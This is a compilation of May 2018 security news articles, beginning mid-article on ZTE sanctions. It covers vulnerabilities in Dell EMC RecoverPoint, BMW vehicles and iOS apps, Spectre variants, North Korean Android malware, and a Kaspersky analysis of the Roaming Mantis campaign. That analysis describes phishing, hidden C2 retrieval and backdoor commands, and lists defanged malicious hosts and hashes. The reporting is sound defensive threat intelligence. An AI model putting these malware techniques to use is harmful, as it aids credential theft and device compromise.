ZTE was fined $1.2 billion in March 2017 but last month it was prohibited from receiving needed US parts after the Commerce Department found the company had lied multiple times and failed to take actions against employees responsible for sanctions violations on Iran and North Korea.

Trump has also faced accusations of quid-pro-quo after pledging to soften sanctions on ZTE just days after AFP reported a Chinese state firm would pour cash into a Trump-tied real estate venture.

According to media reports, lawmakers were incensed last week by Trump's offer to rescue the company, which came via Twitter in the midst of the China trade talks. The president angrily denied back-pedaling.

And in testimony before the Senate on Tuesday, Mnuchin said the administration's primary goal was safeguarding US interests and denied and quid pro quo.

"The objective was not to put ZTE out of business. The objective was to make sure they abide by our sanctions programs," said Mnuchin said.

"I can assure you anything that they consider will take into account the very important national security issues and those will be addressed."

Mnuchin defended the Trump's trade policy, saying he has been "more aggressive than any previous president ever," and is not looking for "short-term gains" but to "create a level playing field and make sure US technology is protected."

The administration's trade actions, together with efforts to reduce business regulation and the recent massive tax cut, already are impacting the economy, Mnuchin said.

He said GDP "could surprise on the upside very significantly" this year with growth of three percent or more.

Many economists see economic growth this year of close to that level, but expect it to slow in 2019 and beyond.


Critical Flaw Impacts Dell EMC RecoverPoint
23.5.2018 securityweek
Vulnerebility

Several security flaws were recently found in Dell EMC RecoverPoint, including a Critical remote code execution vulnerability, security firm Foregenix reveals.

Researchers from Foregenix found a total of six security issues impacting all versions of Dell EMC RecoverPoint prior to 5.1.2, as well as RecoverPoint for Virtual Machines prior to 5.1.1.3.

The flaws were reported to Dell in February, but the company released an update only last week, which only addressed some of the bugs. The available fixes are available through Dell EMC support.

Of the six vulnerabilities, only three received CVE numbers to date. These include CVE-2018-1235 (CVSS 9.8, Critical severity), CVE-2018-1242 (CVSS 6.7, Medium severity), and CVE-2018-1241 (CVSS 6.2, Medium severity).

The most important of the issues allows an unauthenticated remote attacker to execute arbitrary code with root privileges via an unspecified attack vector.

“The critical vulnerability allows unauthenticated remote code execution with root privileges. This means, that if an attacker with no knowledge of any credentials has visibility of RecoverPoint on the network, or local access to it, they can gain complete control over the RecoverPoint and its underlying Linux operating system,” Foregenix reveals.

The security researchers note that, once they gained complete control over the impacted device, they could exploit other unpatched vulnerabilities “to pivot and gain control of the Microsoft Active Directory network that the RecoverPoints were integrated with.”

The second newly discovered flaw is an administrative menu arbitrary file read, which could allow an attacker with access to the boxmgmt administrative menu to read files from the file system (which are accessible to the boxmgmt user).

In certain conditions, RecoverPoint leaks plaintext Lightweight Directory Access Protocol credentials into the Tomcat log file, the security firm says.

“When the LDAP server is not contactable by RecoverPoint, and a log in attempt is made to an LDAP linked account via a RecoverPoint web interface, LDAP credentials are leaked into the tomcat.log file. These credentials may remain in the log file indefinitely, providing opportunity for attackers with access to the RecoverPoint file system to obtain them and resulting in LDAP account compromise,” Foregenix notes.

The researchers also discovered that RecoverPoint is shipped with "root" password hashes for grub stored in /distribution.log, a file readable by any user. CVE was initially issued for the flaw, but Dell apparently revoked it, claiming that the file would be only readable by root, but the researchers claim they could read the file as the www-data user.

Although the CVE was revoked, Dell did fix the flaw for new installations of RecoverPoint. “At the time of writing it was not clear whether the vendor would reinstate the CVE, or whether performing an upgrade would remove the hash from previous versions of the world-readable log file,” Foregenix says.

RecoverPoint was also found to use a hardcoded root password that the user cannot change unless they contact the vendor. An attacker knowing the password could “gain control over all of the devices by logging in at the local console, or gaining console access as an unprivileged user, and changing to root.”

A CVE was not issued for the vulnerability, but the vendor apparently said that a documentation update will make it clear that a dedicated script from the support team is necessary to change the password.

The sixth vulnerability resides in an insecure configuration option that results in LDAP credentials being sent by the RecoverPoint in clear text, thus potentially exposing them to eavesdroppers.

“When the LDAP simple bind configuration is used, credentials are sent from the RecoverPoint server in cleartext. This means that a man-in-the-middle attacker or an attacker who has gained access to the RecoverPoint using another vulnerability, can monitor the traffic and discover LDAP credentials which have been entrusted to the RecoverPoint,” Foregenix says.

The RecoverPoint documentation includes a warning about the insecure configuration, but the RecoverPoint menu itself does not include such an alert.


As EU Privacy Law Looms, Debate Swirls on Cybersecurity Impact
23.5.2018 securityweek Privacy

Days ahead of the implementation of a sweeping European privacy law, debate is swirling on whether the measure will have negative consequences for cybersecurity.

The controversy is about the so-called internet address book or WHOIS directory, which up to now has been a public database identifying the owners of websites and domains.

The database will become largely private under the forthcoming General Data protection Regulation set to take effect May 25, since it contains protected personal information.

US government officials and some cybersecurity professionals fear that without the ability to easily find hackers and other malicious actors through WHOIS, the new rules could lead to a surge in cybercrime, spam and fraud.

Critics say the GDPR could take away an important tool used by law enforcement, security researchers, journalists and others.

The lockdown of the WHOIS directory comes after years of negotiations between EU authorities and ICANN, the nonprofit entity that administers the database and manages the online domain system.

ICANN -- the Internet Corporations for Assigned Names and Numbers -- approved a temporary plan last week that allows access for "legitimate" purposes, but leaves the interpretation to internet registrars, the companies that sell domains and websites.

Assistant Commerce Secretary David Redl, who head the US government division for internet administration, last week called on the EU to delay enforcement of the GDPR for the WHOIS directory.

"The loss of access to WHOIS information will negatively affect law enforcement of cybercrimes, cybersecurity and intellectual property rights protection activities globally," Redl said.

Rob Joyce, who served as White House cybersecurity coordinator until last month, tweeted in April that "GDPR is going to undercut a key tool for identifying malicious domains on the internet," adding that "cyber criminals are celebrating GDPR."

Negative consequences?

Caleb Barlow, vice president at IBM security, also warned that the privacy law "may well have negative consequences that, ironically, run contrary to its original intent."

Barlow said in a blog post earlier this month that "cybersecurity professionals use (WHOIS) information to quickly stop cyberthreats" and that the GDPR restrictions could delay or prevent security firms from acting on these threats.

James Scott, a senior fellow at the Washington-based Institute for Critical Infrastructure Technology, acknowledged that the GDPR rules "could hinder security researchers and law enforcement."

"The information would likely still be discoverable with a warrant or possibly at the request of law enforcement, but the added anonymization layers would severely delay" the identification of malicious actors.

Some analysts say the concerns about cybercrime are overblown, and that sophisticated cybercriminals can easily hide their tracks from WHOIS.

Milton Mueller, a Georgia Tech professor and founder of the Internet Governance Project of independent researchers, said the notion of an upsurge in cybercrime stemming from the rule was "totally bogus."

"There's no evidence that most of the world's cybercrime is stopped or mitigated by WHOIS," Mueller told AFP.

"In fact some of the cybercrime is facilitated by WHOIS is because the bad guys can go after that information too."

Mueller said the directory had been "exploited" for years by commercial entities, some of which resell the data, and authoritarian regimes for broad surveillance.

"It's fundamentally a matter of due process," he said.

"We all agree that when law enforcement has a reasonable cause, they can obtain certain documents, but WHOIS allow unfettered access without any due process check."

No delays

Akram Atallah, president of ICANN's global domains division, told AFP the organization had tried unsuccessfully to get an enforcement delay from the EU for the WHOIS directory to work out rules for access.

The temporary rule will strip out any personal information from WHOIS directory but allow access to the data for "legitimate" purposes, Atallah noted.

"You will need to get permission to see the rest of the data," he said.

That means the registrars, which include companies that sell websites like GoDaddy, will need to determine who gets access or face hefty fines from the EU.

ICANN is working on a process of "accreditation" to grant access, but was unable to predict how long it would take to get a consensus among the government and private stakeholders in the organization.

Matthew Kahn, a Brookings Institution research assistant, said the firms keeping the data are more likely to deny requests rather than face EU penalties.

"With democracies under siege from online election interference and active-measures campaigns, this is no time to hamper governments' and security researchers' abilities to identify and arrest cyber threats," Kahn said on the Lawfare blog.


'I'm sorry', Facebook Boss Tells European Lawmakers
23.5.2018 securityweek
Social

Facebook chief Mark Zuckerberg apologized to the European Parliament on Tuesday for the "harm" caused by a huge breach of users' data and by a failure to crack down on fake news.

But Zuckerberg's appearance failed to satisfy MEPs who accused him of dodging questions and criticized a format that gave the parliament's political leaders far more time to give long-winded speeches.

His livestreamed testimony in Brussels was the latest stop on a tour of apology for the Cambridge Analytica scandal that saw him quizzed for ten hours in the US Congress in April, and will take him to Paris on Wednesday.

Zuckerberg said that while Facebook has brought in new features to connect people, it had become clear in the last two years that they "haven't done enough to prevent these tools from being used for harm".

"And that goes for fake news, foreign interference in elections or developers misusing people's information. We didn't take a broad enough view of our responsibility," he said in his opening statement.

"That was a mistake, and I'm sorry for it."

'Too slow'

The European Parliament invited Zuckerberg in March after Facebook admitted that up to 87 million users may have had their data hijacked by British consultancy firm Cambridge Analytica.

The firm, which was working for US President Donald Trump's 2016 campaign, has since declared bankruptcy.

Zuckerberg originally tried to send a junior executive instead but finally bowed to pressure to appear. However he only agreed for it to be livestreamed on Monday after initially insisting on it being behind closed doors.

Appearing calm and unruffled during the 90-minute hearing, Zuckerberg welcomed the EU's sweeping new personal data protection rules, which come into effect in three days, saying that his website would be "fully compliant".

In that spirit, Zuckerberg said Facebook was bringing in new features including a special "clear history" button that would allow them to delete any cookies or browsing history details it stores.

Zuckerberg admitted that Facebook had been "too slow to identify Russian interfering" in the 2016 US presidential ballot but was working with European governments for future elections.

In the run-up to last year's French elections Facebook "found and took down more than 30,000 fake accounts", he said.

'Pre-cooked format'

But some European lawmakers were still unhappy with the format in which Zuckerberg answered questions for only 25 minutes -- half as long as the time it took the parliament's political leaders to get through their long-winded questions.

"Today's pre-cooked format was inappropriate and ensured Zuckerberg could avoid our questions," Guy Verhofstadt, the European Parliament's Liberal leader, tweeted afterwards.

The former Belgian prime minister asked Zuckerberg during the hearing if he wanted to be remembered as a "genius who created a digital monster".

Manfred Weber, the German head of the centre-right European People's Party, the largest group in parliament, said the Facebook chief was "not very convincing" and "did not answer all our questions".

But European Parliament President Antonio Tajani -- who invited Zuckerberg and arranged the meeting -- called Zuckerberg's visit a "success" even if he said his apology was "not enough" and required follow up.

Zuckerberg meanwhile pledged that Facebook would make fresh investments to protect its users in the wake of the scandal -- with many of those in Europe where he plans to have 10,000 employees by the end of the year.

"It's going to take time to work through all of the changes we must make. But I'm committed to getting it right, and to making the significant investments needed to keep people safe," he added.

"I expect this will significantly impact our profitability. But I want to be clear: keeping people safe will always be more important than maximizing our profits."

Zuckerberg is due to meet French President Emmanuel Macron in Paris on Wednesday.


Chinese researchers from Tencent discovered exploitable flaws in several BMW models
23.5.2018 securityaffairs Security

A team of security researchers from Chinese firm Tencent has discovered 14 security vulnerabilities in several BMW models.
Researchers from the Tencent Keen Security Lab have discovered 14 vulnerabilities affecting several BMW models, including BMW i Series, BMW X Series, BMW 3 Series, BMW 5 Series, and BMW 7 Series.

The team of experts conducted a year-long study between January 2017 and February 2018. They reported the issues to BMW and after the company started rolling out security patches the researchers published technical details for the flaws.

“we systematically performed an in-depth and comprehensive analysis of the hardware
and software on Head Unit, Telematics Control Unit and Central Gateway Module of multiple BMW vehicles.” reads the report published by Tencent Keen Security Lab.

“Through mainly focusing on the various external attack surfaces of these units, we discovered that a remote targeted attack on multiple Internet-Connected BMW vehicles in a wide range of areas is feasible, via a set of remote attack surfaces (including GSM Communication, BMW Remote Service, BMW ConnectedDrive Service, UDS Remote Diagnosis, NGTP protocol, and Bluetooth protocol).”

According to the experts, the vulnerabilities affect car produced from the year 2012. White hat hackers focused their tests on the infotainment and telematics systems of the vehicles.

Eight of the vulnerabilities impact the infotainment system, four issues affect the telematics control unit (TCU), and two the central gateway module.

bmw models hack 2

The TCU provides telephony services, accident assistance services, and implements remote controls of the doors and climate. The central gateway receives diagnostic messages from the TCU and the head unit and sends them to other Electronic Control Units (ECUs) on different CAN buses.

The experts discovered that an attacker could exploit the flaws, or chain some of them, to execute arbitrary code and take complete control of the affected component.

The experts demonstrated that a local attacker could hack BMW vehicles via a USB stick, in another attack scenario the researchers illustrated a remote hack through a software-defined radio.

Remote attacks can be conducted via Bluetooth or via cellular networks, remote hack of a BMW car is very complex to carry on because the attacker would need to hack a local GSM mobile network.

BMW-models Attack-Chains

“Our research findings have proved that it is feasible to gain local and remote access to infotainment, T-Box components and UDS communication above certain speed of selected BMW vehicle modules and been able to gain control of the CAN buses with the execution of arbitrary, unauthorized diagnostic requests of BMW in-car systems remotely,” states the researchers.

BMW issued some security updates to the backend systems, it also rolled out over-the-air patches for the TCU. The company also developed firmware updates that will be made available to customers at dealerships.

Neither BMW nor Keen Lab have revealed the list of affected models.

BMW awarded the Keen Lab as the first winner of the BMW Group Digitalization and IT Research Award.

In July 2017, the same team of security researchers from Chinese firm Tencent demonstrated how to remotely hack a Tesla Model vehicle.


North Korea-linked Sun Team APT group targets deflectors with Android Malware
23.5.2018 securityaffairs  APT

A North Korea-linked APT group tracked as Sun Team has targeted North Korean deflectors with a malicious app that was published in the official Google Play store.

The campaign, named RedDawn by security experts at McAfee, is the second campaign attributed conducted by the same APT group this year.

Experts noticed that this is the first time the APT abused the legitimate Google Play Store as the distribution channel. In a past campaign spotted in January, a group of North Korean deflectors and journalists was targeted via social networks, email, and chat apps.

Researchers at McAfee discovered that the malware was on Google Play as ‘unreleased’ versions and it accounts for only around 100 infections, they also notified it to Google that has already removed the threat from the store.

Once installed, the malware starts copying sensitive information from the device, including personal photos, contacts, and SMS messages, and then sends them to the threat actors.

McAfee found that the hackers managed to upload three applications to Google Play – based on the email accounts and Android devices used in the previous attack. The apps include Food Ingredients Info, Fast AppLock, and AppLockFree. They stayed in Google Play for about 2 months before being removed.

“Our recent discovery of the campaign we have named RedDawn on Google Play just a few weeks after the release of our report proves that targeted attacks on mobile devices are here to stay.” reads the post published by the security firm.

“We found three apps uploaded by the actor we named Sun Team, based on email accounts and Android devices used in the previous attack.”

The experts discovered three apps in the app store, the first one named 음식궁합 (Food Ingredients Info), provides information about food, the remaining apps, Fast AppLock and AppLockFree, are security applications.

While the 음식궁합 and Fast AppLock apps are data stealer malware that receives commands and additional executable (.dex) files from a cloud control server, the AppLockFree is a reconnaissance malware that prepares the installations to further payloads.

The malware spread to friends, asking them to install the malicious apps and offer feedback via a Facebook account with a fake profile promoted 음식궁합.

“After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks.” continues the report. “From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January,”

The logs collected by the malicious apps appear similar to other logs associated with the Sun Team APT group, in an apparently poor opsec the attackers used email addresses for malware’ developers associated with the North Korea group.

Sun Team malware-campaign

Of course, we cannot exclude that this is an intentional false flag to make hard the attribution of the attack.

The malware used in this campaign has been active at least since 2017, researchers observed numerous versions of the same code.

Threat actors are not native South Korean, but familiar with the culture and language.

“In the new malware on Google Play, we again see that the Korean writing in the description is awkward. As in the previous operation, the Dropbox account name follows a similar pattern of using names of celebrities, such as Jack Black, who appeared on Korean TV.” continues the analysis published by McAfee,

“These features are strong evidence that the actors behind these campaigns are not native South Koreans but are familiar with the culture and language. These elements are suggestive though not a confirmation of the nationality of the actors behind these malware campaigns.”

The attackers tested their malware in with mobile devices from several while the exploit code found in a cloud storage revealed modified “versions of publicly available sandbox escape, privilege escalation, code execution exploits.”

Some of the exploits were modified by the attackers, but experts believe that developers are currently not skillful enough to develop their own zero-day exploits,

The Sun Team hackers were observed creating fake accounts using photos from social networks and the identities of South Koreans. In addition to stealing identities, the hackers are using texting and calling services to generate virtual phone numbers that allow them to sign up for online services in South Korea.


The ZipperDown Vulnerability could affect roughly 10% of iOS Apps
23.5.2018 securityaffairs  iOS

Experts from Chinese jailbreakers Pangu Lab, have recently discovered the ZipperDown flaw that could affect roughly 10% of iOS Apps.
ZipperDown, is a recently discovered vulnerability that could affect thousands of iOS apps and maybe also Android users.

The ZipperDown flaw was first reported by experts from Chinese jailbreakers Pangu Lab, that described it as described as a programming error.

The experts estimate 15,978 out of 168,951 iOS apps are affected, roughly 10% of the total. The list of affected apps includes popular applications such as Weibo, MOMO, NetEase Music, QQ Music and Kwai.

“While auditing iOS Apps from various customers, Pangu Lab noticed a common programming error, which leads to severe consequences such as data overwritten and even code execution in the context of affected Apps.” states the report published by the Pangu Lab.

“We created a signature for the issue and performed a large-scale search on our App analysis platform Janus. Surprisingly, we found that round 10% iOS Apps might be affected by the same or similar issues.”

ZipperDown

Pangu Lab has not publicly released details of the flaw and are reporting the problem to the app publishers.

The hackers published a video PoC of the attack that shows a user downloading and using Weibo apps in an unsafe Wi-Fi environment. In this scenario, the attackers gain code execution in the context of user’s Weibo app by exploiting the ZipperDown vulnerability.

According to the experts, an attacker can trigger the ZipperDown flaw if at least two unusual conditions are met. The first condition sees the attacker controls the WiFi network to which the device is connected, the second condition is that the app must be running outside the iOS “sandbox.”

An attacker could exploit the flaw to run illicit applications on the affected device, but Pangu Lab added that the sandbox on both iOS and Android can effectively limit ZipperDown’s consequence.

“What can ZipperDown do?
It depends on the affected app and its privileges. In general, attackers could overwrite the affected app’s data, or even gain code execution in the context of the affected app. Note that the sandbox on both iOS and Android can effectively limit ZipperDown’s consequence.” continues the report.


Roaming Mantis dabbles in mining and phishing multilingually
22.5.2018 Kaspersky
Phishing

In April 2018, Kaspersky Lab published a blogpost titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices. This activity is located mostly in Asia (South Korea, Bangladesh and Japan) based on our telemetry data. Potential victims were redirected by DNS hijacking to a malicious web page that distributed a Trojanized application spoofed Facebook or Chrome that is then installed manually by users. The application actually contained an Android Trojan-Banker.

Soon after our publication it was brought to our attention that other researchers were also focused on this malware family. There was also another publication after we released our own blog. We’d like to acknowledge the good work of our colleagues from other security companies McAfee and TrendMicro covering this threat independently. If you are interested in this topic, you may find the following articles useful:

Android Banking Trojan MoqHao Spreading via SMS Phishing in South Korea
XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing
In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.

27 languages: targeting the world
In our previous blogpost we mentioned that a user attempting to connect to any websites while using a hijacked DNS, will be redirected to malicious landing pages on the rogue server. The landing page displays a popup message that corresponds to the language settings of the device and which urges the user to download a malicious apk file named ‘facebook.apk’ or ‘chrome.apk’.
Kaspersky Lab confirmed several languages hardcoded in the HTML source of the landing page to display the popup message.

The attackers substantially extended their target languages from four to 27, including European and Middle Eastern languages. And yet, they keep adding comments in Simplified Chinese.
But, of course, this multilingualism is not limited to the landing page. The most recent malicious apk (MD5:”fbe10ce5631305ca8bf8cd17ba1a0a35″) also was expanded to supports 27 languages.

The landing page and malicious apk now support the following languages:

Arabic
Bulgarian
Bengali
Czech
German
English
Spanish
Hebrew
Hindi
Armenian
Indonesian
Italian
Japanese
Georgian
Korean
Malay
Polish
Portuguese
Russian
Serbo-Croatian
Thai
Tagalog
Turkish
Ukrainian
Vietnamese
Traditional Chinese
Simplified Chinese
We believe the attacker made use of an easy method to potentially infect more users, by translating their initial set of languages with an automatic translator.

Apple phishing site for iOS device
Previously, this criminal group focused on Android devices only. They have apparently changed their monetizing strategy since then. The attackers now target iOS devices as well, using a phishing site to steal user credentials. When a user connects to the landing page via iOS devices, the user is redirected to ‘http://security.apple.com/’:

A legitimate DNS server wouldn’t be able to resolve a domain name like that, because it simply doesn’t exist. However, a user connecting via a compromised router can access the landing page because the rogue DNS service resolves this domain to the IP address 172.247.116[.]155. The final page is a phishing page mimicking the Apple website with the very reassuring domain name ‘security.apple.com’ in the address bar of the browser.

The phishing site steals user ID, password, card number, card expiration date and CVV. The HTML source of the phishing site also supports 25 languages.

The supported languages are almost the same as on the landing pages and malicious apk files – only Bengali and Georgian are missing from the phishing site.

Web crypto mining for PC
Looking at the HTML source code of the landing page, we also discovered a new feature: web mining via a special script executed in the browser. More details about web miners can be found in our blogpost ‘Mining is the new black‘.

Coinhive is the most popular web miner used by cybercriminals around the world. When a user connects to the landing page from a PC, the CPU usage will drastically increase because of the crypto mining activity in the browser.

Real C2 destination is hidden in email subject
Older malicious apk samples include a legitimate website, accounts and a regular expression for retrieving the real C2 address, which the malware connects to by using a web socket. This process for obtaining its C2 changes in more recent samples, further described below:

MD5 f3ca571b2d1f0ecff371fb82119d1afe 4d9a7e425f8c8b02d598ef0a0a776a58 fbe10ce5631305ca8bf8cd17ba1a0a35
Date March 29 2018 April 7 2018 May 14 2018
File name chrome.apk facebook.apk $random_num{8}.apk
Legitimate web http://my.tv.sohu[.]com/user/%s https://www.baidu[.]com/p/%s/detail n/a
Email n/a n/a @outlook.com
Accounts 329505231
329505325
329505338 haoxingfu88
haoxingfu12389
wokaixin158998 haoxingfu11
haoxingfu22
haoxingfu33
RegExp “<p>([\u4e00-\u9fa5]+?)</p>\s+</div>” “公司</span>([\\u4e00-\\u9fa5]+?)<“ “abcd”
Encrypted dex \assets\db \assets\data.sql \assets\data.sql
Encoding Base64 Base64 + zlib compression Base64 + zlib compression
Older samples retrieved the next C2 by accessing the legitimate website, extracting a Chinese string from a specific part of the HTML code, and decoding it. This scheme has been changed in the recent sample. Instead of using HTML protocol, it now uses email protocol to retrieve the C2.

The malware connects to an email inbox using hardcoded outlook.com credentials via POP3. It then obtains the email subject (in Chinese) and extracts the real C2 address using the string “abcd” as an anchor.
The old and new decoding functions are exactly the same.

We decoded the following next stage C2 servers:

220.136.78[.]40
220.136.73[.]107
Backdoor command “ping”
Kaspersky Lab observed that the previous malicious apk (MD5:f3ca571b2d1f0ecff371fb82119d1afe) had 18 backdoor commands to confirm victims’ environments and to control devices.
According to our analysis, the recent malicious apk (MD5:fbe10ce5631305ca8bf8cd17ba1a0a35) now implements 19 backdoor commands: “ping” was added.

The backdoor commands in the recent sample are as follows:

sendSms
setWifi
gcont
lock
bc
setForward
getForward
hasPkg
setRingerMode
setRecEnable
reqState
showHome
getnpki
http
onRecordAction
call
get_apps
show_fs_float_window
ping NEW
This additional command calls the OS ping command with the IP address of the C2 server. By running this, the attackers validate the availability of the server, packet travel time or detect network filtering in the target network. This feature can also be used to detect semi-isolated research environments.

Auto-generating apk file and filename
Roaming Mantis uses a very simple detection evasion trick on the malicious server. It entails the landing page generating a filename for the malicious apk file using eight random numbers.

Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018. It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes. This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.
However, the malicious apk still contains a loader inside ‘classes.dex’ and an encrypted payload inside ‘\assets\data.sql’ that are identical to those in the previous variants. For security researchers, we have added MD5 hashes of the decrypted payloads without hashes of the whole apk files in the IoC of this report, as well as a few full apk hashes that were uploaded to VirusTotal.

Rapidly improving malicious apk and landing pages
Since our first report, Roaming Mantis has evolved quickly. The update history shows how rapidly the threat has been growing:

The actors behind it have been quite active in improving their tools. As seen in the graph below, which shows the unique detected user counts per day according to KSN data, the count increased on May 5. That date is very close to the update date of the new features on the landing pages.

Geographical expansion
Kaspersky Lab products detect Roaming Mantis’s malicious apk files as ‘Trojan-Banker.AndroidOS.Wroba’. Below is the data from Kaspersky Security Network (KSN) based on the verdict ‘Trojan-Banker.AndroidOS.Wroba.al’ from May 1 to May 10, 2018.

It’s clear from this that South Korea, Bangladesh and Japan are no longer the worst affected countries; instead, Russia, Ukraine and India bore the brunt. According to data gathered between February 9 and April 9, the unique user count was 150. It’s worth mentioning that the most recent data shows more than 120 users of Kaspersky Lab products were affected in just 10 days.
Also, it’s important to note that what we see in the KSN data is probably a tiny fraction of the overall picture. There are two reasons for that:

Some users may be using other AV products or no products at all.
Roaming Mantis, after all, uses DNS hijacking, which prevents even our customers from reporting a detection. However, some devices made it through – probably due to switching to cellular data or connecting to another Wi-Fi network.
Conclusions
The Roaming Mantis campaign evolved significantly in a short period of time. The earliest report of this attack was made public by researchers from McAfee in August 2017. At that time, the Roaming Mantis distribution method was SMS and there was one target: South Korea. When we first reported this attack in April 2018, it had already implemented DNS hijacking and expanded its targets to the wider Asian region.
In our report of April this year, we called it an active and rapidly changing threat. New evidence shows a dramatic expansion in the target geography to include countries from Europe, the Middle East and beyond by supporting 27 languages in total. The attackers have also gone beyond Android devices by adding iOS as a new target, and recently started targeting PC platforms – the landing page PC users are redirected to is now equipped with the Coinhive web miner.
The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.
The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.

For our previous findings, please refer to the Securelist post Roaming Mantis uses DNS hijacking to infect Android smartphones.

Kaspersky products detect this malware as:

HEUR:Trojan-Banker.AndroidOS.Wroba
Kaspersky Lab products block the Coinhive web miner for PC.

IoCs
Malicious hosts:

43.240.14[.]44
118.168.201[.]70 NEW
118.168.202[.]125 NEW
128.14.50[.]147
172.247.116[.]155 NEW
220.136.73[.]107 NEW
220.136.76[.]200
220.136.78[.]40 NEW
220.136.111[.]66
220.136.179[.]5
220.136.182[.]72 NEW
shaoye11.hopto[.]org
haoxingfu01.ddns[.]net
Malicious apks:

03108e7f426416b0eaca9132f082d568
07eab01094567c6d62a73f7098634eb8 NEW
1cc88a79424091121a83d58b6886ea7a
2a1da7e17edaefc0468dbf25a0f60390
31e61e52d38f19cf3958df2239fba1a7
34efc3ebf51a6511c0d12cce7592db73
4d9a7e425f8c8b02d598ef0a0a776a58
531714703557a58584a102ecc34162ff NEW
904b4d615c05952bcf58f35acadee5c1
9f94c34aae5c7d50bc0997d043df032b NEW
a21322b2416fce17a1877542d16929d5
b84b0d5f128a8e0621733a6f3b412e19
bd90279ad5c5a813bc34c06093665e55
cc1e4d3af5698feb36878df0233ab14a NEW
ff163a92f2622f2b8330a5730d3d636c
808b186ddfa5e62ee882d5bdb94cc6e2
ee0718c18b2e9f941b5d0327a27fbda1 NEW
classes.dex:

13c8dda30b866e84163f82b95008790a NEW
19e3daf40460aea22962d98de4bc32d2
1b984d8cb76297efa911a3c49805432e NEW
36b2609a98aa39c730c2f5b49097d0ad
3ba4882dbf2dd6bd4fc0f54ec1373f4c
46c34be9b3ff01e73153937ef35b0766 NEW
5145c98d809bc014c3af39415be8c9ac NEW
6116dc0a59e4859a32caddaefda4dbf4 NEW
8a4ed9c4a66d7ccb3d155f85383ea3b3
a5d2403b98cddcd80b79a4658df4d147 NEW
b43335b043212355619fd827b01be9a0
b4152bee9eca9eb247353e0ecab37aa5 NEW
b7afa4b2dafb57886fc47a1355824199
bf5538df0688961ef6fccb5854883a20 NEW
f89214bfa4b4ac9000087e4253e7f754
6cac4c9eda750a69e435c801a7ca7b8d
e56cccd689a9e354cb539bb069733a43 NEW
fe0198f4b3d9dc501c2b7db2750a228b NEW
Decrypted payload (dex file) from \assets\data.sql:

1bd7815bece1b54b7728b8dd16f1d3a9
28ef823d10a3b78f8840310484e3cc69 NEW
307d2780185ba2b8c5ad4c9256407504
3e01b64fb9fe9605fee7c07e42907a3b NEW
3e4bff0e8ed962f3c420692a35d2e503
3ed3b8ecce178c2e977a269524f43576 NEW
57abbe642b85fa00b1f76f62acad4d3b
6e1926d548ffac0f6cedfb4a4f49196e
6d5f6065ec4112f1581732206539e72e NEW
7714321baf6a54b09baa6a777b9742ef
7aa46b4d67c3ab07caa53e8d8df3005c
a0f88c77b183da227b9902968862c2b9
b964645e76689d7e0d09234fb7854ede


Tech Firms Coordinate Disclosure of New Meltdown, Spectre Flaws
22.5.2018 securityweek 
Vulnerebility

Intel, AMD, ARM, IBM, Microsoft and other major tech companies on Monday released updates, mitigations and advisories for two new variants of the speculative execution attack methods known as Meltdown and Spectre.

In January, researchers from several organizations warned that processors from Intel, AMD, ARM and other companies are affected by vulnerabilities that allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data.

Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2), while Meltdown attacks are possible due to CVE-2017-5754 (Variant 3). Researchers at Google Project Zero and Microsoft recently identified a new method which they have dubbed Variant 4.

Variant 4 relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639. Companies have also shared details on Variant 3a, a Rogue System Register Read issue tracked as CVE-2018-3640. Variant 3a was documented by ARM back in January, but it went largely unnoticed.New Meltdown and Spectre variants discovered

A German magazine reported in early May that Intel and others had been working on patches for several new Spectre flaws dubbed “Spectre-NG.” Reports claimed the new variants may be more serious and easier to exploit, but none of the impacted vendors appear too concerned about the new findings, in most cases assigning medium/moderate/important severity ratings.

Microsoft is still analyzing its products, but so far it has not identified any code in its software or cloud service infrastructure that allows exploitation of Variant 4. The company says its previous Meltdown and Spectre mitigations should address this variant as well, and noted that “Microsoft Edge, Internet Explorer, and other major browsers have taken steps to increase the difficulty of successfully creating a side channel.”

As for Variant 3a, Microsoft says “the mitigation for this vulnerability is exclusively through a microcode/firmware update, and there is no additional Microsoft Windows operating system update.”

Intel has already developed microcode patches that should address both Variant 3a and Variant 4. Beta versions have been provided to OEMs and operating system vendors, and BIOS and software updates are expected to become available in the next weeks.

“[The mitigation for Variant 4] will be set to off-by-default, providing customers the choice of whether to enable it. We expect most industry software partners will likewise use the default-off option,” said Leslie Culbertson, executive vice president and general manager of Product Assurance and Security at Intel.

If the mitigation is enabled, there may be a negative impact on performance of roughly 2-8 percent, the chipmaker says.

AMD claims it has not identified any products vulnerable to Variant 3a and any patches for Variant 4 should be expected from Microsoft and Linux distributions.

IBM has released both operating system and firmware updates to patch Variant 4 in its Power Systems clients.

The list of other organizations that published advisories and blog posts for Variant 3a and Variant 4 include Red Hat, VMware, Oracle, Cisco, Xen, Ubuntu, Suse, CERT/CC and US-CERT.

Several other side-channel attack methods have been identified since the initial disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime. The most recently discovered method has allowed researchers to gain access to the highly privileged System Management Mode (SMM) memory.


TheMoon botnet is now leveraging a zero-day to target GPON routers

22.5.2018 securityaffairs Vulnerebility

Security experts from Qihoo 360 Netlab discovered the operators behind the TheMoon botnet are now leveraging a zero-day exploit to target GPON routers.
